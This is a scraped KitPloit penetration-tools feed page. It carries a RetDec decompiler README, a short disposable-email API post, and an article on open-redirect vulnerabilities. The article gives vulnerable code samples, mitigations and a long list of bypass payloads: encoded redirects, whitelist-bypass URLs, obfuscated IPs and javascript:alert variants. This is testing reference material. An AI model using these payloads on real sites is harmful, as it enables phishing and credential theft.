Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5854 articles
Browse latest View live

RetDec - A Retargetable Machine-Code Decompiler Based On LLVM

$
0
0

RetDec is a retargetable machine-code decompiler based on LLVM.
The decompiler is not limited to any particular target architecture, operating system, or executable file format:
  • Supported file formats: ELF, PE, Mach-O, COFF, AR (archive), Intel HEX, and raw machine code
  • Supported architectures:
    • 32-bit: Intel x86, ARM, MIPS, PIC32, and PowerPC
    • 64-bit: x86-64, ARM64 (AArch64)
Features:
  • Static analysis of executable files with detailed information.
  • Compiler and packer detection.
  • Loading and instruction decoding.
  • Signature-based removal of statically linked library code.
  • Extraction and utilization of debugging information (DWARF, PDB).
  • Reconstruction of instruction idioms.
  • Detection and reconstruction of C++ class hierarchies (RTTI, vtables).
  • Demangling of symbols from C++ binaries (GCC, MSVC, Borland).
  • Reconstruction of functions, types, and high-level constructs.
  • Integrated disassembler.
  • Output in two high-level languages: C and a Python-like language.
  • Generation of call graphs, control-flow graphs, and various statistics.
For more information, check out our

Installation and Use
Currently, we support Windows (7 or later), Linux, macOS, and (experimentally) FreeBSD. An installed version of RetDec requires approximately 4 GB of free disk space.

Windows
  1. Either download and unpack a pre-built package, or build and install the decompiler by yourself (the process is described below).
  2. Install Microsoft Visual C++ Redistributable for Visual Studio 2015.
  3. Install the following programs:
    • Python (version >= 3.4)
    • UPX (Optional: if you want to use UPX unpacker in the preprocessing stage)
    • Graphviz (Optional: if you want to generate call or control flow graphs)
  4. Now, you are all set to run the decompiler. To decompile a binary file named test.exe, run the following command (ensure that python runs Python 3; as an alternative, you can try py -3)
    python $RETDEC_INSTALL_DIR/bin/retdec-decompiler.py test.exe
    For more information, run retdec-decompiler.py with --help.

Linux
  1. Either download and unpack a pre-built package, or build and install the decompiler by yourself (the process is described below).
  2. After you have built the decompiler, you will need to install the following packages via your distribution's package manager:
    • Python (version >= 3.4)
    • UPX (Optional: if you want to use UPX unpacker in the preprocessing stage)
    • Graphviz (Optional: if you want to generate call or control flow graphs)
  3. Now, you are all set to run the decompiler. To decompile a binary file named test.exe, run
    $RETDEC_INSTALL_DIR/bin/retdec-decompiler.py test.exe
    For more information, run retdec-decompiler.py with --help.

macOS
  1. Either download and unpack a pre-built package, or build and install the decompiler by yourself (the process is described below).
  2. After you have built the decompiler, you will need to install the following packages:
    • Python (version >= 3.4)
    • UPX (Optional: if you want to use UPX unpacker in the preprocessing stage)
    • Graphviz (Optional: if you want to generate call or control flow graphs)
  3. Now, you are all set to run the decompiler. To decompile a binary file named test.exe, run
    $RETDEC_INSTALL_DIR/bin/retdec-decompiler.py test.exe
    For more information, run retdec-decompiler.py with --help.

FreeBSD (Experimental)
  1. There are currently no pre-built "ports" packages for FreeBSD. You will have to build and install the decompiler by yourself. The process is described below.
  2. After you have built the decompiler, you may need to install the following packages and execute the following command:
    sudo pkg install python37
    sudo ln -s /usr/local/bin/python3.7 /usr/local/bin/python3
  3. Now, you are all set to run the decompiler. To decompile a binary file named test.exe, run
    $RETDEC_INSTALL_DIR/bin/retdec-decompiler.py test.exe
    For more information, run retdec-decompiler.py with --help.

Build and Installation
This section describes a local build and installation of RetDec. Instructions for Docker are given in the next section.

Requirements

Linux
On Debian-based distributions (e.g. Ubuntu), the required packages can be installed with apt-get:
sudo apt-get install build-essential cmake git perl python3 bison flex libfl-dev autoconf automake libtool pkg-config m4 zlib1g-dev upx doxygen graphviz
On RPM-based distributions (e.g. Fedora), the required packages can be installed with dnf:
sudo dnf install gcc gcc-c++ cmake make git perl python3 bison flex autoconf automake libtool pkg-config m4 zlib-devel upx doxygen graphviz
On Arch Linux, the required packages can be installed with pacman:
sudo pacman --needed -S base-devel cmake git perl python3 bison flex autoconf automake libtool pkg-config m4 zlib upx doxygen graphviz

Windows
  • Microsoft Visual C++ (version >= Visual Studio 2015 Update 2)
  • CMake (version >= 3.6)
  • Git
  • Flex + Bison (mirror) from the Win flex-bison project. Add the extracted directory to the system Path (HOWTO).
  • Active Perl. It needs to be the first Perl in PATH, or it has to be provided to CMake using CMAKE_PROGRAM_PATH variable, e.g. -DCMAKE_PROGRAM_PATH=/c/perl/bin. Does NOT work with Strawberry Perl or MSYS2 Perl (you would have to install a pre-built version of OpenSSL, see below).
    • Alternatively, you can install OpenSSL directly from here. This means OpenSSL won't be built and you don't need to install any Perl. Do not install Light version of OpenSSL as they don't contain development files.
  • Python (version >= 3.4)
  • Optional: Doxygen and Graphviz for generating API documentation

macOS
Packages should be preferably installed via Homebrew.

FreeBSD (Experimental)
Packages should be installed via FreeBSDs pre-compiled package repository using the pkg command or built from scratch using the ports database method.
  • Full "pkg" tool instructions: handbook pkg method
    • pkg install cmake python37 bison git autotools OR
  • Full "ports" instructions: handbook ports method
    • portsnap fetch
    • portsnap extract
  • For example, cmake would be
    • whereis cmake
    • cd /usr/ports/devel/cmake
    • make install clean

Process
Note: Although RetDec now supports a system-wide installation (#94), unless you use your distribution's package manager to install it, we recommend installing RetDec locally into a designated directory. The reason for this is that uninstallation will be easier as you will only need to remove a single directory. To perform a local installation, run cmake with the -DCMAKE_INSTALL_PREFIX=<path> parameter, where <path> is directory into which RetDec will be installed (e.g. $HOME/projects/retdec-install on Linux and macOS, and C:\projects\retdec-install on Windows).
  • Clone the repository:
    • git clone https://github.com/avast/retdec
  • Linux:
    • cd retdec
    • mkdir build && cd build
    • cmake .. -DCMAKE_INSTALL_PREFIX=<path>
    • make -jN (N is the number of processes to use for parallel build, typically number of cores + 1 gives fastest compilation time)
    • make install
  • Windows:
    • Open a command prompt (e.g. cmd.exe)
    • cd retdec
    • mkdir build && cd build
    • cmake .. -DCMAKE_INSTALL_PREFIX=<path> -G<generator>
    • cmake --build . --config Release -- -m
    • cmake --build . --config Release --target install
    • Alternatively, you can open retdec.sln generated by cmake in Visual Studio IDE
  • macOS:
    • cd retdec
    • mkdir build && cd build
    • # Apple ships old Flex & Bison, so Homebrew versions should be used.
      export CMAKE_INCLUDE_PATH="/usr/local/opt/flex/include"
      export CMAKE_LIBRARY_PATH="/usr/local/opt/flex/lib;/usr/local/opt/bison/lib"
      export PATH="/usr/local/opt/flex/bin:/usr/local/opt/bison/bin:$PATH"
    • cmake .. -DCMAKE_INSTALL_PREFIX=<path>
    • make -jN (N is the number of processes to use for parallel build, typically number of cores + 1 gives fastest compilation time)
    • make install
  • FreeBSD:
    • sudo pkg install git cmake
    • git clone https://github.com/avast/retdec
    • cd retdec
    • mkdir build && cd build
    • # FreeBSD (and other BSDs) do need cmake, python3, bison, git, autotools. Flex and perl are pre-installed in the OS but check versions.
      # Later versions may be available for each of the packages.
      # See what is installed:
      sudo pkg info cmake python37 bison autotools
      # Install/upgrade them:
      sudo pkg install cmake python37 bison autotools
    • cmake .. -DCMAKE_INSTALL_PREFIX=<path>
    • make -jN (N is the number of processes to use for parallel build, typically number of cores + 1 gives fastest compilation time)
    • make install
You have to pass the following parameters to cmake:
  • -DCMAKE_INSTALL_PREFIX=<path> to set the installation path to <path>. Quote the path if you are using backslashes on Windows (e.g. -DCMAKE_INSTALL_PREFIX="C:\retdec").
  • (Windows only) -G<generator> is -G"Visual Studio 14 2015" for 32-bit build using Visual Studio 2015, or -G"Visual Studio 14 2015 Win64" for 64-bit build using Visual Studio 2015. Later versions of Visual Studio may be used.
You can pass the following additional parameters to cmake:
  • -DRETDEC_DOC=ON to build with API documentation (requires Doxygen and Graphviz, disabled by default).
  • -DRETDEC_TESTS=ON to build with tests (disabled by default).
  • -DRETDEC_DEV_TOOLS=ON to build with development tools (disabled by default).
  • -DRETDEC_FORCE_OPENSSL_BUILD=ON to force OpenSSL build even if it is installed in the system (disabled by default).
  • -DRETDEC_COMPILE_YARA=OFF to disable YARA rules compilation at installation step (enabled by default).
  • -DCMAKE_BUILD_TYPE=Debug to build with debugging information, which is useful during development. By default, the project is built in the Release mode. This has no effect on Windows, but the same thing can be achieved by running cmake --build . with the --config Debug parameter.
  • -DCMAKE_PROGRAM_PATH=<path> to use Perl at <path> (probably useful only on Windows).
  • -D<dep>_LOCAL_DIR=<path> where <dep> is from {CAPSTONE, ELFIO, GOOGLETEST, JSONCPP, KEYSTONE, LIBDWARF, LLVM, PELIB, RAPIDJSON, TINYXML, YARACPP, YARAMOD} (e.g. -DCAPSTONE_LOCAL_DIR=<path>), to use the local repository clone at <path> for RetDec dependency instead of downloading a fresh copy at build time. Multiple such options may be used at the same time.
  • -DRETDEC_ENABLE_<component>=ON to build only the specified component(s) (multiple such options can be used at once), and its (theirs) dependencies. By default, all the components are built. If at least one component is enabled via this mechanism, all the other components that were not explicitly enabled (and are not needed as dependencies of enabled components) are not built. See cmake/options.cmake for all the available component options.
    • -DRETDEC_ENABLE_ALL=ON can be used to (re-)enable all the components.
    • Alternatively, -DRETDEC_ENABLE=<comma-separated component list> can be used instead of -DRETDEC_ENABLE_<component>=ON (e.g. -DRETDEC_ENABLE=fileformat,loader,ctypesparser is equivalent to -DRETDEC_ENABLE_FILEFORMAT=ON -DRETDEC_ENABLE_LOADER=ON -DRETDEC_ENABLE_CTYPESPARSER=ON).

Build in Docker
Docker support is maintained by community. If something does not work for you or if you have suggestions for improvements, open an issue or PR.

Build Image
Building in Docker does not require installation of the required libraries locally. This is a good option for trying out RetDec without setting up the whole build toolchain.
To build the RetDec Docker image, run
docker build -t retdec - < Dockerfile
This builds the image from the master branch of this repository.
To build the image using the local copy of the repository, use the development Dockerfile, Dockerfile.dev:
docker build -t retdec:dev . -f Dockerfile.dev

Run Container
If your uid is not 1000, make sure that the directory containing your input binary files is accessible for RetDec:
chmod 0777 /path/to/local/directory
Now, you can run the decompiler inside a container:
docker run --rm -v /path/to/local/directory:/destination retdec retdec-decompiler.py /destination/binary
Note: Do not modify the /destination part is. You only need to change /path/to/local/directory. Output files will then be generated to /path/to/local/directory.

Automated TeamCity Builds
Our TeamCity servers are continuously generating up-to-date RetDec packages from the latest commit in the master branch. These are mostly meant to be used by RetDec developers, contributors, and other people experimenting with the product (e.g. testing if an issue present in the official release still exists in the current master).
You can use these as you wish, but keep in mind that there are no guarantees they will work on your system (especially the Linux version), and that regressions are a possibility. To get a stable RetDec version, either download the latest official pre-built package or build the latest RetDec version tag.

Repository Overview
This repository contains the following libraries:
  • ar-extractor - library for extracting object files from archives (based on LLVM).
  • bin2llvmir - library of LLVM passes for translating binaries into LLVM IR modules.
  • capstone2llvmir - binary instructions to LLVM IR translation library.
  • config - library for representing and managing RetDec configuration databases.
  • cpdetect - library for compiler and packer detection in binaries.
  • crypto - collection of cryptographic functions.
  • ctypes - C++ library for representing C function data types.
  • debugformat - library for uniform representation of DWARF and PDB debugging information.
  • demangler - demangling library capable to handle names generated by the GCC/Clang, Microsoft Visual C++, and Borland C++ compilers.
  • dwarfparser - library for high-level representation of DWARF debugging information.
  • fileformat - library for parsing and uniform representation of various object file formats. Currently supporting the following formats: COFF, ELF, Intel HEX, Mach-O, PE, raw data.
  • llvm-support - set of LLVM related utility functions.
  • llvmir-emul - LLVM IR emulation library used for unit testing.
  • llvmir2hll - library for translating LLVM IR modules to high-level source codes (C, Python-like language).
  • loader - library for uniform representation of binaries loaded to memory. Supports the same formats as fileformat.
  • macho-extractor - library for extracting regular Mach-O binaries from fat Mach-O binaries (based on LLVM).
  • patterngen - binary pattern extractor library.
  • pdbparser - Microsoft PDB files parser library.
  • stacofin - static code finder library.
  • unpacker - collection of unpacking functions.
  • utils - general C++ utility library.
This repository contains the following tools:
  • ar-extractortool - frontend for the ar-extractor library (installed as retdec-ar-extractor).
  • bin2llvmirtool - frontend for the bin2llvmir library (installed as retdec-bin2llvmir).
  • bin2pat - tool for generating patterns from binaries (installed as retdec-bin2pat).
  • capstone2llvmirtool - frontend for the capstone2llvmir library (installed as retdec-capstone2llvmir).
  • configtool - frontend for the config library (installed as retdec-config).
  • ctypesparser - C++ library for parsing C function data types from JSON files into ctypes representation (installed as retdec-ctypesparser).
  • demangler_grammar_gen -- tool for generating new grammars for the demangler library (installed as retdec-demangler-grammar-gen).
  • demanglertool -- frontend for the demangler library (installed as retdec-demangler).
  • fileinfo - binary analysis tool. Supports the same formats as fileformat (installed as retdec-fileinfo).
  • idr2pat - tool for extracting patterns from IDR knowledge bases (installed as retdec-idr2pat).
  • llvmir2hlltool - frontend for the llvmir2hll library (installed as retdec-llvmir2hll).
  • macho-extractortool - frontend for the macho-extractor library (installed as retdec-macho-extractor).
  • pat2yara - tool for processing patterns to YARA signatures (installed as retdec-pat2yara).
  • stacofintool - frontend for the stacofin library (installed as retdec-stacofin).
  • unpackertool - plugin-based unpacker (installed as retdec-unpacker).
This repository contains the following scripts:
  • retdec-decompiler.py - the main decompilation script binding it all together. This is the tool to use for full binary-to-C decompilations.
  • Support scripts used by retdec-decompiler.py:
    • retdec-color-c.py - decorates output C sources with IDA color tags - syntax highlighting for IDA.
    • retdec-config.py - decompiler's configuration file.
    • retdec-archive-decompiler.py - decompiles objects in the given AR archive.
    • retdec-fileinfo.py - a Fileinfo tool wrapper.
    • retdec-signature-from-library-creator.py - extracts function signatures from the given library.
    • retdec-unpacker.py - tries to unpack the given executable file by using any of the supported unpackers.
    • retdec-utils.py - a collection of Python utilities.
  • retdec-tests-runner.py - run all tests in the unit test directory.
  • type_extractor - generation of type information (for internal use only)

Project Documentation
See the project documentation for an up to date Doxygen-generated software reference corresponding to the latest commit in the master branch.

Related Repositories

License
Copyright (c) 2017 Avast Software, licensed under the MIT license. See the LICENSE file for more details.
RetDec uses third-party libraries or other resources listed, along with their licenses, in the LICENSE-THIRD-PARTY file.

Contributing
See RetDec contribution guidelines.

Acknowledgements
This software was supported by the research funding TACR (Technology Agency of the Czech Republic), ALFA Programme No. TA01010667.



AntiDisposmail - Detecting Disposable Email Addresses

$
0
0

Antbot.pw provides a free, open API endpoint for checking a domain or email address against a frequently-updated list of disposable domains. CORS is enabled for all originating domains, so you can call the API directly from your client-side code.
GET https://antibot.pw/api/disposable?email=radenvodka@0815.su HTTP/1.1
The response will be JSON with one boolean property, e.g. {"disposable":false}
Using jQuery?

<script>
$( "#email" ).change(function() {
var val = $("#email").val();
$.get('https://antibot.pw/api/disposable?email='+val,
function (data, textStatus) {
if(data['disposable'] == true){
alert("email disposable");
}
});
});
</script>


Open Redirect Payload List

$
0
0

Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.
Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access.

Java :
response.sendRedirect("http://www.mysite.com");  

PHP :
<?php
/* Redirect browser */
header("Location: http://www.mysite.com");
?>

ASP .NET :
Response.Redirect("~/folder/Login.aspx")

Rails :
redirect_to login_path
In the examples above, the URL is being explicitly declared in the code and cannot be manipulated by an attacker.

Dangerous URL Redirects
The following examples demonstrate unsafe redirect and forward code.

Dangerous URL Redirect Example 1
The following Java code receives the URL from the parameter named url (GET or POST) and redirects to that URL:
response.sendRedirect(request.getParameter("url"));
The following PHP code obtains a URL from the query string (via the parameter named url) and then redirects the user to that URL:
$redirect_url = $_GET['url'];
header("Location: " . $redirect_url);
A similar example of C# .NET Vulnerable Code:
string url = request.QueryString["url"];
Response.Redirect(url);
And in Rails:
redirect_to params[:url]
The above code is vulnerable to an attack if no validation or extra method controls are applied to verify the certainty of the URL. This vulnerability could be used as part of a phishing scam by redirecting users to a malicious site.
If no validation is applied, a malicious user could create a hyperlink to redirect your users to an unvalidated malicious website, for example:
http://example.com/example.php?url=http://malicious.example.com
The user sees the link directing to the original trusted site (example.com) and does not realize the redirection that could take place

Dangerous URL Redirect Example 2
ASP .NET MVC 1 & 2 websites are particularly vulnerable to open redirection attacks. In order to avoid this vulnerability, you need to apply MVC 3.
The code for the LogOn action in an ASP.NET MVC 2 application is shown below. After a successful login, the controller returns a redirect to the returnUrl. You can see that no validation is being performed against the returnUrl parameter.
ASP.NET MVC 2 LogOn action in AccountController.cs (see Microsoft Docs link provided above for the context):
[HttpPost]
public ActionResult LogOn(LogOnModel model, string returnUrl)
{
if (ModelState.IsValid)
{
if (MembershipService.ValidateUser(model.UserName, model.Password))
{
FormsService.SignIn(model.UserName, model.RememberMe);
if (!String.IsNullOrEmpty(returnUrl))
{
return Redirect(returnUrl);
}
else
{
return RedirectToAction("Index", "Home");
}
}
else
{
ModelState.AddModelError("", "The user name or password provided is incorrect.");
}
}

// If we got this far, something failed, redisplay form
return View(model);
}

Preventing Unvalidated Redirects and Forwards
Safe use of redirects and forwards can be done in a number of ways:
  • Simply avoid using redirects and forwards.
  • If used, do not allow the url as user input for the destination. This can usually be done. In this case, you should have a method to validate URL.
  • If user input can’t be avoided, ensure that the supplied value is valid, appropriate for the application, and is authorized for the user.
  • It is recommended that any such destination input be mapped to a value, rather than the actual URL or portion of the URL, and that server side code translate this value to the target URL.
  • Sanitize input by creating a list of trusted URL's (lists of hosts or a regex).
  • Force all redirects to first go through a page notifying users that they are going off of your site, and have them click a link to confirm.

Open Redirect Payload List :
/%09/example.com
/%2f%2fexample.com
/%2f%2f%2fbing.com%2f%3fwww.omise.co
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
/%5cexample.com
/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
/.example.com
//%09/example.com
//%5cexample.com
///%09/example.com
///%5cexample.com
////%09/example.com
////%5cexample.com
/////example.com
/////example.com/
////\;@example.com
////example.com/
////example.com/%2e%2e
////example.com/%2e%2e%2f
////example.com/%2f%2e%2e
////example.com/%2f..
////example.com//
///\;@example.com
///example.com
///example.com/
//google.com/%2f..
//www.whitelisteddomain.tld@google.com/%2f..
///google.com/%2f..
///www.whitelisteddomain.tld@google.com/%2f..
////google.com/%2f..
////www.whitelisteddomain.tld@google.com/%2f..
https://google.com/%2f..
https://www.whitelisteddomain.tld@google.com/%2f..
/https://google.com/%2f..
/https: //www.whitelisteddomain.tld@google.com/%2f..
//www.google.com/%2f%2e%2e
//www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
///www.google.com/%2f%2e%2e
///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
////www.google.com/%2f%2e%2e
////www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
https://www.google.com/%2f%2e%2e
https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
/https://www.google.com/%2f%2e%2e
/https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
//google.com/
//www.whitelisteddomain.tld@google.com/
///google.com/
///www.whitelisteddomain.tld@google.com/
////google.com/
////www.whitelisteddomain.tld@google.com/
https://google.com/
https://www.whitelisteddomain.tld@google.com/
/https://google.com/
/https://www.whitelisteddomain.tld@google.com/
//google.com//
//www.whitelisteddomain.tld@google.com//
///google.com//
///www.whitelisteddomain.tld@google.com//
//// google.com//
////www.whitelisteddomain.tld@google.com//
https://google.com//
https://www.whitelisteddomain.tld@google.com//
//https://google.com//
//https://www.whitelisteddomain.tld@google.com//
//www.google.com/%2e%2e%2f
//www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
///www.google.com/%2e%2e%2f
///www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
////www.google.com/%2e%2e%2f
////www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
https://www.google.com/%2e%2e%2f
https://www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
//https://www.google.com/%2e%2e%2f
//https://www.whitelisteddomain.tld@www.google.com/%2e%2e%2f
///www.google.com/%2e%2e
///www.whitelisteddomain.tld@www.google.com/%2e%2e
////www.google.com/%2e%2e
////www.whitelisteddomain.tld@www.google.com/%2e%2e
https:///www.google.com/%2e%2e
https:///www.whitelisteddomain.tld@www.google.com/%2e%2e
//https:///www.google.com/%2e%2e
//www.whitelisteddomain.tld@https:///www.google.com/%2e%2e
/https://www.google.com/%2e%2e
/https://www.whitelisteddomain.tld@www.google.com/%2e%2e
///www.google.com/%2f%2e%2e
///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
////www.google.com/%2f%2e%2e
////www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
https:///www.google.com/%2f%2e%2e
https:///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
/https://www.google.com/%2f%2e%2e
/https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
/https:///www.google.com/%2f%2e%2e
/https:///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e
/%09/google.com
/%09/www.whitelisteddomain.tld@google.com
//%09/google.com
//%09/www.whitelisteddomain.tld@google.com
///%09/google.com
///%09/www.whitelisteddomain.tld@google.com
////%09/google.com
////%09/www.whitelisteddomain.tld@google.com
https://%09/google.com
https://%09/www.whitelisteddomain.tld@google. com
/%5cgoogle.com
/%5cwww.whitelisteddomain.tld@google.com
//%5cgoogle.com
//%5cwww.whitelisteddomain.tld@google.com
///%5cgoogle.com
///%5cwww.whitelisteddomain.tld@google.com
////%5cgoogle.com
////%5cwww.whitelisteddomain.tld@google.com
https://%5cgoogle.com
https://%5cwww.whitelisteddomain.tld@google.com
/https://%5cgoogle.com
/https://%5cwww.whitelisteddomain.tld@google.com
https://google.com
https://www.whitelisteddomain.tld@google.com
javascript:alert(1);
javascript:alert(1)
//javascript:alert(1);
/javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
//google.com
https:google.com
//google%E3%80%82com
\/\/google.com/
/\/google.com/
//google.com
https ://www.whitelisteddomain.tld/https://www.google.com/
";alert(0);//
javascript://www.whitelisteddomain.tld?%a0alert%281%29
http://0xd8.0x3a.0xd6.0xce
http://www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http://0xd83ad6ce
http://www.whitelisteddomain.tld@0xd83ad6ce
http://3H6k7lIAiqjfNeN@0xd83ad6ce
http://XY>.7d8T\205pZM@0xd83ad6ce
http://3627734734
http://www.whitelisteddomain.tld@3627734734
http://3H6k7lIAiqjfNeN@3627734734
http://XY>.7d8T\205pZM@3627734734
http://472.314.470.462
http://www.whitelisteddomain.tld@472.314.470.462
http://3H6k7lIAiqjfNeN@472.314.470.462
http://XY>.7d8T\205pZM@472.314.470.462
http://0330.072.0326.0316
http://www.whitelisteddomain.tld@0330.072.0326.0316
http://3H6k7lIAiqjfNeN@0330.072.0326.0316
http://XY>.7d8T\205pZM@0330.072.0326.0316
http://00330.00072.0000326.000 00316
http://www.whitelisteddomain.tld@00330.00072.0000326.00000316
http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
http://[::216.58.214.206]
http://www.whitelisteddomain.tld@[::216.58.214.206]
http://3H6k7lIAiqjfNeN@[::216.58.214.206]
http://XY>.7d8T\205pZM@[::216.58.214.206]
http://[::ffff:216.58.214.206]
http://www.whitelisteddomain.tld@[::ffff:216.58.214.206]
http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http://0xd8.072.54990
http://www.whitelisteddomain.tld@0xd8.072.54990
http://3H6k7lIAiqjfNeN@0xd8.072.54990
http://XY>.7d8T\205pZM@0xd8.072.54990
http://0xd8.3856078
http://www.whitelisteddomain.tld@0xd8.3856078
http://3H6k7lIAiqjfNeN@0xd8.3856078
http://XY>.7d8T\205pZM@0xd8.3856078
http://00330.3856078
http://www.whitelisteddomain.tld@00330.3856078
http://3H6k7lIAiqjfNeN@003 30.3856078
http://XY>.7d8T\205pZM@00330.3856078
http://00330.0x3a.54990
http://www.whitelisteddomain.tld@00330.0x3a.54990
http://3H6k7lIAiqjfNeN@00330.0x3a.54990
http://XY>.7d8T\205pZM@00330.0x3a.54990
http:0xd8.0x3a.0xd6.0xce
http:www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce
http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http:0xd83ad6ce
http:www.whitelisteddomain.tld@0xd83ad6ce
http:3H6k7lIAiqjfNeN@0xd83ad6ce
http:XY>.7d8T\205pZM@0xd83ad6ce
http:3627734734
http:www.whitelisteddomain.tld@3627734734
http:3H6k7lIAiqjfNeN@3627734734
http:XY>.7d8T\205pZM@3627734734
http:472.314.470.462
http:www.whitelisteddomain.tld@472.314.470.462
http:3H6k7lIAiqjfNeN@472.314.470.462
http:XY>.7d8T\205pZM@472.314.470.462
http:0330.072.0326.0316
http:www.whitelisteddomain.tld@0330.072.0326.0316
http:3H6k7lIAiqjfNeN@0330.072.0326.0316
http:XY>.7d8T\20 5pZM@0330.072.0326.0316
http:00330.00072.0000326.00000316
http:www.whitelisteddomain.tld@00330.00072.0000326.00000316
http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
http:[::216.58.214.206]
http:www.whitelisteddomain.tld@[::216.58.214.206]
http:3H6k7lIAiqjfNeN@[::216.58.214.206]
http:XY>.7d8T\205pZM@[::216.58.214.206]
http:[::ffff:216.58.214.206]
http:www.whitelisteddomain.tld@[::ffff:216.58.214.206]
http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http:0xd8.072.54990
http:www.whitelisteddomain.tld@0xd8.072.54990
http:3H6k7lIAiqjfNeN@0xd8.072.54990
http:XY>.7d8T\205pZM@0xd8.072.54990
http:0xd8.3856078
http:www.whitelisteddomain.tld@0xd8.3856078
http:3H6k7lIAiqjfNeN@0xd8.3856078
http:XY>.7d8T\205pZM@0xd8.3856078
http:00330.3856078
http:www.whitelisteddomain.tld@00330.3856078
http:3H6k7lI AiqjfNeN@00330.3856078
http:XY>.7d8T\205pZM@00330.3856078
http:00330.0x3a.54990
http:www.whitelisteddomain.tld@00330.0x3a.54990
http:3H6k7lIAiqjfNeN@00330.0x3a.54990
http:XY>.7d8T\205pZM@00330.0x3a.54990
〱google.com
〵google.com
ゝgoogle.com
ーgoogle.com
ーgoogle.com
/〱google.com
/〵google.com
/ゝgoogle.com
/ーgoogle.com
/ーgoogle.com
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
<>javascript:alert(1);
<>//google.com
//google.com\@www.whitelisteddomain.tld
https://:@google.com\@www.whitelisteddomain.tld
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
ja\nva\tscript\r:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
\152\141\166\141\163\143\162\151\160\164\072alert(1)
http://google.co m:80#@www.whitelisteddomain.tld/
http://google.com:80?@www.whitelisteddomain.tld/
///example.com/%2e%2e
///example.com/%2e%2e%2f
///example.com/%2f%2e%2e
///example.com/%2f..
///example.com//
//example.com
//example.com/
//example.com/%2e%2e
//example.com/%2e%2e%2f
//example.com/%2f%2e%2e
//example.com/%2f..
//example.com//
//google.com
//google%E3%80%82com
//https:///example.com/%2e%2e
//https://example.com/%2e%2e%2f
//https://example.com//
/<>//example.com
/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redirect_uri=/\/example.com
/?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://example.com&rurl=Https://example.com&redirect_uri=Https://example.com< br/>/\/\/example.com/
/\/example.com/
/example.com/%2f%2e%2e
/http://%67%6f%6f%67%6c%65%2e%63%6f%6d
/http://example.com
/http:/example.com
/https:/%5cexample.com/
/https://%09/example.com
/https://%5cexample.com
/https:///example.com/%2e%2e
/https:///example.com/%2f%2e%2e
/https://example.com
/https://example.com/
/https://example.com/%2e%2e
/https://example.com/%2e%2e%2f
/https://example.com/%2f%2e%2e
/https://example.com/%2f..
/https://example.com//
/https:example.com
/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com&redirect_uri=//example.com
/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com&redirect_uri=/\/example.com
/redirect?url=Https://example.com&next=Https://example.com&redirect=Https://example.com&redir=Https://exampl e.com&rurl=Https://example.com&redirect_uri=Https://example.com

//%2fxgoogle.com
/ReceiveAutoRedirect/false?desiredLocationUrl=http://xssposed.org
//localdomain.pw/%2f..
//www.whitelisteddomain.tld@localdomain.pw/%2f..
///localdomain.pw/%2f..
///www.whitelisteddomain.tld@localdomain.pw/%2f..
////localdomain.pw/%2f..
////www.whitelisteddomain.tld@localdomain.pw/%2f..
https://localdomain.pw/%2f..
https://www.whitelisteddomain.tld@localdomain.pw/%2f..
/https://localdomain.pw/%2f..
/https://www.whitelisteddomain.tld@localdomain.pw/%2f..
//localdomain.pw/%2f%2e%2e
//www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
///localdomain.pw/%2f%2e%2e
///www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
////localdomain.pw/%2f%2e%2e
////www.whitelisteddomain.tld@localdomain.pw/%2f%2e%2e
https://localdomain.pw/%2f%2e%2e
